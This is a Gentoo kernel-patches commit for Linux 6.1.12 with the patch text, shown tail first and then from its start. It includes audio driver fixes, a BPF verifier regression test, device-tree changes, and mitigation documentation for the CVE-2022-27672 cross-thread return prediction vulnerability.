+diff --git a/sound/soc/intel/boards/sof_nau8825.c b/sound/soc/intel/boards/sof_nau8825.c
+index 009a41fbefa10..0c723d4d2d63b 100644
+--- a/sound/soc/intel/boards/sof_nau8825.c
++++ b/sound/soc/intel/boards/sof_nau8825.c
+@@ -479,8 +479,6 @@ static struct snd_soc_dai_link *sof_card_dai_links_create(struct device *dev,
+ 			links[id].num_codecs = ARRAY_SIZE(max_98373_components);
+ 			links[id].init = max_98373_spk_codec_init;
+ 			links[id].ops = &max_98373_ops;
+-			/* feedback stream */
+-			links[id].dpcm_capture = 1;
+ 		} else if (sof_nau8825_quirk &
+ 				SOF_MAX98360A_SPEAKER_AMP_PRESENT) {
+ 			max_98360a_dai_link(&links[id]);
+@@ -493,6 +491,9 @@ static struct snd_soc_dai_link *sof_card_dai_links_create(struct device *dev,
+ 		links[id].platforms = platform_component;
+ 		links[id].num_platforms = ARRAY_SIZE(platform_component);
+ 		links[id].dpcm_playback = 1;
++		/* feedback stream or firmware-generated echo reference */
++		links[id].dpcm_capture = 1;
++
+ 		links[id].no_pcm = 1;
+ 		links[id].cpus = &cpus[id];
+ 		links[id].num_cpus = 1;
+diff --git a/sound/soc/intel/boards/sof_rt5682.c b/sound/soc/intel/boards/sof_rt5682.c
+index 2358be208c1fd..59c58ef932e4d 100644
+--- a/sound/soc/intel/boards/sof_rt5682.c
++++ b/sound/soc/intel/boards/sof_rt5682.c
+@@ -761,8 +761,6 @@ static struct snd_soc_dai_link *sof_card_dai_links_create(struct device *dev,
+ 			links[id].num_codecs = ARRAY_SIZE(max_98373_components);
+ 			links[id].init = max_98373_spk_codec_init;
+ 			links[id].ops = &max_98373_ops;
+-			/* feedback stream */
+-			links[id].dpcm_capture = 1;
+ 		} else if (sof_rt5682_quirk &
+ 				SOF_MAX98360A_SPEAKER_AMP_PRESENT) {
+ 			max_98360a_dai_link(&links[id]);
+@@ -789,6 +787,9 @@ static struct snd_soc_dai_link *sof_card_dai_links_create(struct device *dev,
+ 		links[id].platforms = platform_component;
+ 		links[id].num_platforms = ARRAY_SIZE(platform_component);
+ 		links[id].dpcm_playback = 1;
++		/* feedback stream or firmware-generated echo reference */
++		links[id].dpcm_capture = 1;
++
+ 		links[id].no_pcm = 1;
+ 		links[id].cpus = &cpus[id];
+ 		links[id].num_cpus = 1;
+diff --git a/sound/soc/intel/boards/sof_ssp_amp.c b/sound/soc/intel/boards/sof_ssp_amp.c
+index 94d25aeb6e7ce..7b74f122e3400 100644
+--- a/sound/soc/intel/boards/sof_ssp_amp.c
++++ b/sound/soc/intel/boards/sof_ssp_amp.c
+@@ -258,13 +258,12 @@ static struct snd_soc_dai_link *sof_card_dai_links_create(struct device *dev,
+ 		sof_rt1308_dai_link(&links[id]);
+ 	} else if (sof_ssp_amp_quirk & SOF_CS35L41_SPEAKER_AMP_PRESENT) {
+ 		cs35l41_set_dai_link(&links[id]);
+-
+-		/* feedback from amplifier */
+-		links[id].dpcm_capture = 1;
+ 	}
+ 	links[id].platforms = platform_component;
+ 	links[id].num_platforms = ARRAY_SIZE(platform_component);
+ 	links[id].dpcm_playback = 1;
++	/* feedback from amplifier or firmware-generated echo reference */
++	links[id].dpcm_capture = 1;
+ 	links[id].no_pcm = 1;
+ 	links[id].cpus = &cpus[id];
+ 	links[id].num_cpus = 1;
+diff --git a/sound/soc/sof/intel/hda-dai.c b/sound/soc/sof/intel/hda-dai.c
+index 556e883a32edb..5f03ee390d54b 100644
+--- a/sound/soc/sof/intel/hda-dai.c
++++ b/sound/soc/sof/intel/hda-dai.c
+@@ -216,6 +216,10 @@ static int hda_link_dma_hw_params(struct snd_pcm_substream *substream,
+ 	struct hdac_bus *bus = hstream->bus;
+ 	struct hdac_ext_link *link;
+ 
++	link = snd_hdac_ext_bus_get_link(bus, codec_dai->component->name);
++	if (!link)
++		return -EINVAL;
++
+ 	hext_stream = snd_soc_dai_get_dma_data(cpu_dai, substream);
+ 	if (!hext_stream) {
+ 		hext_stream = hda_link_stream_assign(bus, substream);
+@@ -225,10 +229,6 @@ static int hda_link_dma_hw_params(struct snd_pcm_substream *substream,
+ 		snd_soc_dai_set_dma_data(cpu_dai, substream, (void *)hext_stream);
+ 	}
+ 
+-	link = snd_hdac_ext_bus_get_link(bus, codec_dai->component->name);
+-	if (!link)
+-		return -EINVAL;
+-
+ 	/* set the hdac_stream in the codec dai */
+ 	snd_soc_dai_set_stream(codec_dai, hdac_stream(hext_stream), substream->stream);
+ 
+diff --git a/sound/soc/sof/sof-audio.c b/sound/soc/sof/sof-audio.c
+index 2df433c6ef55f..cf2c0db57d899 100644
+--- a/sound/soc/sof/sof-audio.c
++++ b/sound/soc/sof/sof-audio.c
+@@ -431,11 +431,11 @@ sof_walk_widgets_in_order(struct snd_sof_dev *sdev, struct snd_soc_dapm_widget_l
+ 
+ 	for_each_dapm_widgets(list, i, widget) {
+ 		/* starting widget for playback is AIF type */
+-		if (dir == SNDRV_PCM_STREAM_PLAYBACK && !WIDGET_IS_AIF(widget->id))
++		if (dir == SNDRV_PCM_STREAM_PLAYBACK && widget->id != snd_soc_dapm_aif_in)
+ 			continue;
+ 
+ 		/* starting widget for capture is DAI type */
+-		if (dir == SNDRV_PCM_STREAM_CAPTURE && !WIDGET_IS_DAI(widget->id))
++		if (dir == SNDRV_PCM_STREAM_CAPTURE && widget->id != snd_soc_dapm_dai_out)
+ 			continue;
+ 
+ 		switch (op) {
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 3d13fdf7590cd..3ecd1ba7fd4b1 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2152,6 +2152,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+ 	DEVICE_FLG(0x0525, 0xa4ad, /* Hamedal C20 usb camero */
+ 		   QUIRK_FLAG_IFACE_SKIP_CLOSE),
++	DEVICE_FLG(0x0ecb, 0x205c, /* JBL Quantum610 Wireless */
++		   QUIRK_FLAG_FIXED_RATE),
+ 	DEVICE_FLG(0x0ecb, 0x2069, /* JBL Quantum810 Wireless */
+ 		   QUIRK_FLAG_FIXED_RATE),
+ 
+diff --git a/tools/testing/memblock/internal.h b/tools/testing/memblock/internal.h
+index 85973e55489e7..fdb7f5db73082 100644
+--- a/tools/testing/memblock/internal.h
++++ b/tools/testing/memblock/internal.h
+@@ -15,10 +15,6 @@ bool mirrored_kernelcore = false;
+ 
+ struct page {};
+ 
+-void __free_pages_core(struct page *page, unsigned int order)
+-{
+-}
+-
+ void memblock_free_pages(struct page *page, unsigned long pfn,
+ 			 unsigned int order)
+ {
+diff --git a/tools/testing/selftests/bpf/verifier/search_pruning.c b/tools/testing/selftests/bpf/verifier/search_pruning.c
+index 68b14fdfebdb1..d63fd8991b03a 100644
+--- a/tools/testing/selftests/bpf/verifier/search_pruning.c
++++ b/tools/testing/selftests/bpf/verifier/search_pruning.c
+@@ -225,3 +225,39 @@
+ 	.result_unpriv = ACCEPT,
+ 	.insn_processed = 15,
+ },
++/* The test performs a conditional 64-bit write to a stack location
++ * fp[-8], this is followed by an unconditional 8-bit write to fp[-8],
++ * then data is read from fp[-8]. This sequence is unsafe.
++ *
++ * The test would be mistakenly marked as safe w/o dst register parent
++ * preservation in verifier.c:copy_register_state() function.
++ *
++ * Note the usage of BPF_F_TEST_STATE_FREQ to force creation of the
++ * checkpoint state after conditional 64-bit assignment.
++ */
++{
++	"write tracking and register parent chain bug",
++	.insns = {
++	/* r6 = ktime_get_ns() */
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),
++	/* r0 = ktime_get_ns() */
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	/* if r0 > r6 goto +1 */
++	BPF_JMP_REG(BPF_JGT, BPF_REG_0, BPF_REG_6, 1),
++	/* *(u64 *)(r10 - 8) = 0xdeadbeef */
++	BPF_ST_MEM(BPF_DW, BPF_REG_FP, -8, 0xdeadbeef),
++	/* r1 = 42 */
++	BPF_MOV64_IMM(BPF_REG_1, 42),
++	/* *(u8 *)(r10 - 8) = r1 */
++	BPF_STX_MEM(BPF_B, BPF_REG_FP, BPF_REG_1, -8),
++	/* r2 = *(u64 *)(r10 - 8) */
++	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_FP, -8),
++	/* exit(0) */
++	BPF_MOV64_IMM(BPF_REG_0, 0),
++	BPF_EXIT_INSN(),
++	},
++	.flags = BPF_F_TEST_STATE_FREQ,
++	.errstr = "invalid read from stack off -8+1 size 8",
++	.result = REJECT,
++},
+diff --git a/tools/testing/selftests/net/cmsg_ipv6.sh b/tools/testing/selftests/net/cmsg_ipv6.sh
+index 2d89cb0ad2889..330d0b1ceced3 100755
+--- a/tools/testing/selftests/net/cmsg_ipv6.sh
++++ b/tools/testing/selftests/net/cmsg_ipv6.sh
+@@ -6,7 +6,7 @@ ksft_skip=4
+ NS=ns
+ IP6=2001:db8:1::1/64
+ TGT6=2001:db8:1::2
+-TMPF=`mktemp`
++TMPF=$(mktemp --suffix ".pcap")
+ 
+ cleanup()
+ {
+diff --git a/tools/testing/selftests/net/mptcp/userspace_pm.sh b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+index 0040e3bc7b16e..ad6547c79b831 100755
+--- a/tools/testing/selftests/net/mptcp/userspace_pm.sh
++++ b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+@@ -778,6 +778,14 @@ test_subflows()
+ 
+ test_subflows_v4_v6_mix()
+ {
++	local client_evts
++	client_evts=$(mktemp)
++	# Capture events on the network namespace running the client
++	:>"$client_evts"
++	ip netns exec "$ns2" ./pm_nl_ctl events >> "$client_evts" 2>&1 &
++	evts_pid=$!
++	sleep 0.5
++
+ 	# Attempt to add a listener at 10.0.2.1:<subflow-port>
+ 	ip netns exec "$ns1" ./pm_nl_ctl listen 10.0.2.1\
+ 	   $app6_port > /dev/null 2>&1 &
+@@ -820,6 +828,9 @@ test_subflows_v4_v6_mix()
+ 	ip netns exec "$ns1" ./pm_nl_ctl rem id $server_addr_id token\
+ 	   "$server6_token" > /dev/null 2>&1
+ 	sleep 0.5
++
++	kill_wait $evts_pid
++	rm -f "$client_evts"
+ }
+ 
+ test_prio()
+diff --git a/tools/virtio/linux/bug.h b/tools/virtio/linux/bug.h
+index 813baf13f62a2..51a919083d9b8 100644
+--- a/tools/virtio/linux/bug.h
++++ b/tools/virtio/linux/bug.h
+@@ -1,13 +1,11 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+-#ifndef BUG_H
+-#define BUG_H
++#ifndef _LINUX_BUG_H
++#define _LINUX_BUG_H
+ 
+ #include <asm/bug.h>
+ 
+ #define BUG_ON(__BUG_ON_cond) assert(!(__BUG_ON_cond))
+ 
+-#define BUILD_BUG_ON(x)
+-
+ #define BUG() abort()
+ 
+-#endif /* BUG_H */
++#endif /* _LINUX_BUG_H */
+diff --git a/tools/virtio/linux/build_bug.h b/tools/virtio/linux/build_bug.h
+new file mode 100644
+index 0000000000000..cdbb75e28a604
+--- /dev/null
++++ b/tools/virtio/linux/build_bug.h
+@@ -0,0 +1,7 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef _LINUX_BUILD_BUG_H
++#define _LINUX_BUILD_BUG_H
++
++#define BUILD_BUG_ON(x)
++
++#endif	/* _LINUX_BUILD_BUG_H */
+diff --git a/tools/virtio/linux/cpumask.h b/tools/virtio/linux/cpumask.h
+new file mode 100644
+index 0000000000000..307da69d6b26c
+--- /dev/null
++++ b/tools/virtio/linux/cpumask.h
+@@ -0,0 +1,7 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef _LINUX_CPUMASK_H
++#define _LINUX_CPUMASK_H
++
++#include <linux/kernel.h>
++
++#endif /* _LINUX_CPUMASK_H */
+diff --git a/tools/virtio/linux/gfp.h b/tools/virtio/linux/gfp.h
+new file mode 100644
+index 0000000000000..43d146f236f14
+--- /dev/null
++++ b/tools/virtio/linux/gfp.h
+@@ -0,0 +1,7 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef __LINUX_GFP_H
++#define __LINUX_GFP_H
++
++#include <linux/topology.h>
++
++#endif
+diff --git a/tools/virtio/linux/kernel.h b/tools/virtio/linux/kernel.h
+index 21593bf977552..8b877167933d1 100644
+--- a/tools/virtio/linux/kernel.h
++++ b/tools/virtio/linux/kernel.h
+@@ -10,6 +10,7 @@
+ #include <stdarg.h>
+ 
+ #include <linux/compiler.h>
++#include <linux/log2.h>
+ #include <linux/types.h>
+ #include <linux/overflow.h>
+ #include <linux/list.h>
+diff --git a/tools/virtio/linux/kmsan.h b/tools/virtio/linux/kmsan.h
+new file mode 100644
+index 0000000000000..272b5aa285d5a
+--- /dev/null
++++ b/tools/virtio/linux/kmsan.h
+@@ -0,0 +1,12 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef _LINUX_KMSAN_H
++#define _LINUX_KMSAN_H
++
++#include <linux/gfp.h>
++
++inline void kmsan_handle_dma(struct page *page, size_t offset, size_t size,
++			     enum dma_data_direction dir)
++{
++}
++
++#endif /* _LINUX_KMSAN_H */
+diff --git a/tools/virtio/linux/scatterlist.h b/tools/virtio/linux/scatterlist.h
+index 369ee308b6686..74d9e1825748e 100644
+--- a/tools/virtio/linux/scatterlist.h
++++ b/tools/virtio/linux/scatterlist.h
+@@ -2,6 +2,7 @@
+ #ifndef SCATTERLIST_H
+ #define SCATTERLIST_H
+ #include <linux/kernel.h>
++#include <linux/bug.h>
+ 
+ struct scatterlist {
+ 	unsigned long	page_link;
+diff --git a/tools/virtio/linux/topology.h b/tools/virtio/linux/topology.h
+new file mode 100644
+index 0000000000000..910794afb993a
+--- /dev/null
++++ b/tools/virtio/linux/topology.h
+@@ -0,0 +1,7 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef _LINUX_TOPOLOGY_H
++#define _LINUX_TOPOLOGY_H
++
++#include <linux/cpumask.h>
++
++#endif /* _LINUX_TOPOLOGY_H */


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-14 18:35 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-14 18:35 UTC (permalink / raw
  To: gentoo-commits

commit:     e0f675c61b0a5790fe66a5e27c34f460c83f4a62
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Feb 14 18:34:43 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Feb 14 18:34:43 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e0f675c6

Linux patch 6.1.12

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1011_linux-6.1.12.patch | 4604 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4608 insertions(+)

diff --git a/0000_README b/0000_README
index 479e5981..92068c30 100644
--- a/0000_README
+++ b/0000_README
@@ -87,6 +87,10 @@ Patch:  1010_linux-6.1.11.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.11
 
+Patch:  1011_linux-6.1.12.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.12
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1011_linux-6.1.12.patch b/1011_linux-6.1.12.patch
new file mode 100644
index 00000000..df59d2d7
--- /dev/null
+++ b/1011_linux-6.1.12.patch
@@ -0,0 +1,4604 @@
+diff --git a/Documentation/admin-guide/hw-vuln/cross-thread-rsb.rst b/Documentation/admin-guide/hw-vuln/cross-thread-rsb.rst
+new file mode 100644
+index 0000000000000..ec6e9f5bcf9e8
+--- /dev/null
++++ b/Documentation/admin-guide/hw-vuln/cross-thread-rsb.rst
+@@ -0,0 +1,92 @@
++
++.. SPDX-License-Identifier: GPL-2.0
++
++Cross-Thread Return Address Predictions
++=======================================
++
++Certain AMD and Hygon processors are subject to a cross-thread return address
++predictions vulnerability. When running in SMT mode and one sibling thread
++transitions out of C0 state, the other sibling thread could use return target
++predictions from the sibling thread that transitioned out of C0.
++
++The Spectre v2 mitigations protect the Linux kernel, as it fills the return
++address prediction entries with safe targets when context switching to the idle
++thread. However, KVM does allow a VMM to prevent exiting guest mode when
++transitioning out of C0. This could result in a guest-controlled return target
++being consumed by the sibling thread.
++
++Affected processors
++-------------------
++
++The following CPUs are vulnerable:
++
++    - AMD Family 17h processors
++    - Hygon Family 18h processors
++
++Related CVEs
++------------
++
++The following CVE entry is related to this issue:
++
++   ==============  =======================================
++   CVE-2022-27672  Cross-Thread Return Address Predictions
++   ==============  =======================================
++
++Problem
++-------
++
++Affected SMT-capable processors support 1T and 2T modes of execution when SMT
++is enabled. In 2T mode, both threads in a core are executing code. For the
++processor core to enter 1T mode, it is required that one of the threads
++requests to transition out of the C0 state. This can be communicated with the
++HLT instruction or with an MWAIT instruction that requests non-C0.
++When the thread re-enters the C0 state, the processor transitions back
++to 2T mode, assuming the other thread is also still in C0 state.
++
++In affected processors, the return address predictor (RAP) is partitioned
++depending on the SMT mode. For instance, in 2T mode each thread uses a private
++16-entry RAP, but in 1T mode, the active thread uses a 32-entry RAP. Upon
++transition between 1T/2T mode, the RAP contents are not modified but the RAP
++pointers (which control the next return target to use for predictions) may
++change. This behavior may result in return targets from one SMT thread being
++used by RET predictions in the sibling thread following a 1T/2T switch. In
++particular, a RET instruction executed immediately after a transition to 1T may
++use a return target from the thread that just became idle. In theory, this
++could lead to information disclosure if the return targets used do not come
++from trustworthy code.
++
++Attack scenarios
++----------------
++
++An attack can be mounted on affected processors by performing a series of CALL
++instructions with targeted return locations and then transitioning out of C0
++state.
++
++Mitigation mechanism
++--------------------
++
++Before entering idle state, the kernel context switches to the idle thread. The
++context switch fills the RAP entries (referred to as the RSB in Linux) with safe
++targets by performing a sequence of CALL instructions.
++
++Prevent a guest VM from directly putting the processor into an idle state by
++intercepting HLT and MWAIT instructions.
++
++Both mitigations are required to fully address this issue.
++
++Mitigation control on the kernel command line
++---------------------------------------------
++
++Use existing Spectre v2 mitigations that will fill the RSB on context switch.
++
++Mitigation control for KVM - module parameter
++---------------------------------------------
++
++By default, the KVM hypervisor mitigates this issue by intercepting guest
++attempts to transition out of C0. A VMM can use the KVM_CAP_X86_DISABLE_EXITS
++capability to override those interceptions, but since this is not common, the
++mitigation that covers this path is not enabled by default.
++
++The mitigation for the KVM_CAP_X86_DISABLE_EXITS capability can be turned on
++using the boolean module parameter mitigate_smt_rsb, e.g.:
++        kvm.mitigate_smt_rsb=1
+diff --git a/Documentation/admin-guide/hw-vuln/index.rst b/Documentation/admin-guide/hw-vuln/index.rst
+index 4df436e7c4177..e0614760a99e7 100644
+--- a/Documentation/admin-guide/hw-vuln/index.rst
++++ b/Documentation/admin-guide/hw-vuln/index.rst
+@@ -18,3 +18,4 @@ are configurable at compile, boot or run time.
+    core-scheduling.rst
+    l1d_flush.rst
+    processor_mmio_stale_data.rst
++   cross-thread-rsb.rst
+diff --git a/Makefile b/Makefile
+index e039f2af17722..23390805e5217 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 11
++SUBLEVEL = 12
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm64/boot/dts/amlogic/meson-axg.dtsi b/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
+index 04f797b5a012c..73cd1791a13fa 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
+@@ -1885,7 +1885,7 @@
+ 			sd_emmc_b: sd@5000 {
+ 				compatible = "amlogic,meson-axg-mmc";
+ 				reg = <0x0 0x5000 0x0 0x800>;
+-				interrupts = <GIC_SPI 217 IRQ_TYPE_EDGE_RISING>;
++				interrupts = <GIC_SPI 217 IRQ_TYPE_LEVEL_HIGH>;
+ 				status = "disabled";
+ 				clocks = <&clkc CLKID_SD_EMMC_B>,
+ 					<&clkc CLKID_SD_EMMC_B_CLK0>,
+@@ -1897,7 +1897,7 @@
+ 			sd_emmc_c: mmc@7000 {
+ 				compatible = "amlogic,meson-axg-mmc";
+ 				reg = <0x0 0x7000 0x0 0x800>;
+-				interrupts = <GIC_SPI 218 IRQ_TYPE_EDGE_RISING>;
++				interrupts = <GIC_SPI 218 IRQ_TYPE_LEVEL_HIGH>;
+ 				status = "disabled";
+ 				clocks = <&clkc CLKID_SD_EMMC_C>,
+ 					<&clkc CLKID_SD_EMMC_C_CLK0>,
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+index 45947c1031c42..894cea697550a 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+@@ -2318,7 +2318,7 @@
+ 		sd_emmc_a: sd@ffe03000 {
+ 			compatible = "amlogic,meson-axg-mmc";
+ 			reg = <0x0 0xffe03000 0x0 0x800>;
+-			interrupts = <GIC_SPI 189 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <GIC_SPI 189 IRQ_TYPE_LEVEL_HIGH>;
+ 			status = "disabled";
+ 			clocks = <&clkc CLKID_SD_EMMC_A>,
+ 				 <&clkc CLKID_SD_EMMC_A_CLK0>,
+@@ -2330,7 +2330,7 @@
+ 		sd_emmc_b: sd@ffe05000 {
+ 			compatible = "amlogic,meson-axg-mmc";
+ 			reg = <0x0 0xffe05000 0x0 0x800>;
+-			interrupts = <GIC_SPI 190 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <GIC_SPI 190 IRQ_TYPE_LEVEL_HIGH>;
+ 			status = "disabled";
+ 			clocks = <&clkc CLKID_SD_EMMC_B>,
+ 				 <&clkc CLKID_SD_EMMC_B_CLK0>,
+@@ -2342,7 +2342,7 @@
+ 		sd_emmc_c: mmc@ffe07000 {
+ 			compatible = "amlogic,meson-axg-mmc";
+ 			reg = <0x0 0xffe07000 0x0 0x800>;
+-			interrupts = <GIC_SPI 191 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <GIC_SPI 191 IRQ_TYPE_LEVEL_HIGH>;
+ 			status = "disabled";
+ 			clocks = <&clkc CLKID_SD_EMMC_C>,
+ 				 <&clkc CLKID_SD_EMMC_C_CLK0>,
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gx.dtsi b/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
+index 023a520054947..fa6cff4a2ebc3 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
+@@ -602,21 +602,21 @@
+ 			sd_emmc_a: mmc@70000 {
+ 				compatible = "amlogic,meson-gx-mmc", "amlogic,meson-gxbb-mmc";
+ 				reg = <0x0 0x70000 0x0 0x800>;
+-				interrupts = <GIC_SPI 216 IRQ_TYPE_EDGE_RISING>;
++				interrupts = <GIC_SPI 216 IRQ_TYPE_LEVEL_HIGH>;
+ 				status = "disabled";
+ 			};
+ 
+ 			sd_emmc_b: mmc@72000 {
+ 				compatible = "amlogic,meson-gx-mmc", "amlogic,meson-gxbb-mmc";
+ 				reg = <0x0 0x72000 0x0 0x800>;
+-				interrupts = <GIC_SPI 217 IRQ_TYPE_EDGE_RISING>;
++				interrupts = <GIC_SPI 217 IRQ_TYPE_LEVEL_HIGH>;
+ 				status = "disabled";
+ 			};
+ 
+ 			sd_emmc_c: mmc@74000 {
+ 				compatible = "amlogic,meson-gx-mmc", "amlogic,meson-gxbb-mmc";
+ 				reg = <0x0 0x74000 0x0 0x800>;
+-				interrupts = <GIC_SPI 218 IRQ_TYPE_EDGE_RISING>;
++				interrupts = <GIC_SPI 218 IRQ_TYPE_LEVEL_HIGH>;
+ 				status = "disabled";
+ 			};
+ 		};
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195.dtsi b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+index 0b85b5874a4f9..6f5fa7ca49013 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+@@ -1966,7 +1966,7 @@
+ 		};
+ 
+ 		vdosys0: syscon@1c01a000 {
+-			compatible = "mediatek,mt8195-mmsys", "syscon";
++			compatible = "mediatek,mt8195-vdosys0", "mediatek,mt8195-mmsys", "syscon";
+ 			reg = <0 0x1c01a000 0 0x1000>;
+ 			mboxes = <&gce0 0 CMDQ_THR_PRIO_4>;
+ 			#clock-cells = <1>;
+@@ -2101,7 +2101,7 @@
+ 		};
+ 
+ 		vdosys1: syscon@1c100000 {
+-			compatible = "mediatek,mt8195-mmsys", "syscon";
++			compatible = "mediatek,mt8195-vdosys1", "syscon";
+ 			reg = <0 0x1c100000 0 0x1000>;
+ 			#clock-cells = <1>;
+ 		};
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399.dtsi b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+index 92c2207e686ce..59858f2dc8b9f 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+@@ -2221,13 +2221,11 @@
+ 		pcfg_input_pull_up: pcfg-input-pull-up {
+ 			input-enable;
+ 			bias-pull-up;
+-			drive-strength = <2>;
+ 		};
+ 
+ 		pcfg_input_pull_down: pcfg-input-pull-down {
+ 			input-enable;
+ 			bias-pull-down;
+-			drive-strength = <2>;
+ 		};
+ 
+ 		clock {
+diff --git a/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts b/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
+index 539ef8cc77923..44313a18e484e 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
+@@ -642,7 +642,7 @@
+ 	disable-wp;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&sdmmc0_bus4 &sdmmc0_clk &sdmmc0_cmd &sdmmc0_det>;
+-	sd-uhs-sdr104;
++	sd-uhs-sdr50;
+ 	vmmc-supply = <&vcc3v3_sd>;
+ 	vqmmc-supply = <&vccio_sd>;
+ 	status = "okay";
+diff --git a/arch/powerpc/kernel/interrupt.c b/arch/powerpc/kernel/interrupt.c
+index fc6631a805272..0ec1581619db5 100644
+--- a/arch/powerpc/kernel/interrupt.c
++++ b/arch/powerpc/kernel/interrupt.c
+@@ -50,16 +50,18 @@ static inline bool exit_must_hard_disable(void)
+  */
+ static notrace __always_inline bool prep_irq_for_enabled_exit(bool restartable)
+ {
++	bool must_hard_disable = (exit_must_hard_disable() || !restartable);
++
+ 	/* This must be done with RI=1 because tracing may touch vmaps */
+ 	trace_hardirqs_on();
+ 
+-	if (exit_must_hard_disable() || !restartable)
++	if (must_hard_disable)
+ 		__hard_EE_RI_disable();
+ 
+ #ifdef CONFIG_PPC64
+ 	/* This pattern matches prep_irq_for_idle */
+ 	if (unlikely(lazy_irq_pending_nocheck())) {
+-		if (exit_must_hard_disable() || !restartable) {
++		if (must_hard_disable) {
+ 			local_paca->irq_happened |= PACA_IRQ_HARD_DIS;
+ 			__hard_RI_enable();
+ 		}
+diff --git a/arch/riscv/kernel/probes/kprobes.c b/arch/riscv/kernel/probes/kprobes.c
+index 388ecada500c1..cca2b3a2135ad 100644
+--- a/arch/riscv/kernel/probes/kprobes.c
++++ b/arch/riscv/kernel/probes/kprobes.c
+@@ -65,16 +65,18 @@ static bool __kprobes arch_check_kprobe(struct kprobe *p)
+ 
+ int __kprobes arch_prepare_kprobe(struct kprobe *p)
+ {
+-	unsigned long probe_addr = (unsigned long)p->addr;
++	u16 *insn = (u16 *)p->addr;
+ 
+-	if (probe_addr & 0x1)
++	if ((unsigned long)insn & 0x1)
+ 		return -EILSEQ;
+ 
+ 	if (!arch_check_kprobe(p))
+ 		return -EILSEQ;
+ 
+ 	/* copy instruction */
+-	p->opcode = *p->addr;
++	p->opcode = (kprobe_opcode_t)(*insn++);
++	if (GET_INSN_LENGTH(p->opcode) == 4)
++		p->opcode |= (kprobe_opcode_t)(*insn) << 16;
+ 
+ 	/* decode instruction */
+ 	switch (riscv_probe_decode_insn(p->addr, &p->ainsn.api)) {
+diff --git a/arch/riscv/kernel/stacktrace.c b/arch/riscv/kernel/stacktrace.c
+index bcfe9eb55f80f..85cd5442d2f81 100644
+--- a/arch/riscv/kernel/stacktrace.c
++++ b/arch/riscv/kernel/stacktrace.c
+@@ -30,6 +30,7 @@ void notrace walk_stackframe(struct task_struct *task, struct pt_regs *regs,
+ 		fp = (unsigned long)__builtin_frame_address(0);
+ 		sp = current_stack_pointer;
+ 		pc = (unsigned long)walk_stackframe;
++		level = -1;
+ 	} else {
+ 		/* task blocked in __switch_to */
+ 		fp = task->thread.s[0];
+@@ -41,7 +42,7 @@ void notrace walk_stackframe(struct task_struct *task, struct pt_regs *regs,
+ 		unsigned long low, high;
+ 		struct stackframe *frame;
+ 
+-		if (unlikely(!__kernel_text_address(pc) || (level++ >= 1 && !fn(arg, pc))))
++		if (unlikely(!__kernel_text_address(pc) || (level++ >= 0 && !fn(arg, pc))))
+ 			break;
+ 
+ 		/* Validate frame pointer */
+diff --git a/arch/riscv/mm/cacheflush.c b/arch/riscv/mm/cacheflush.c
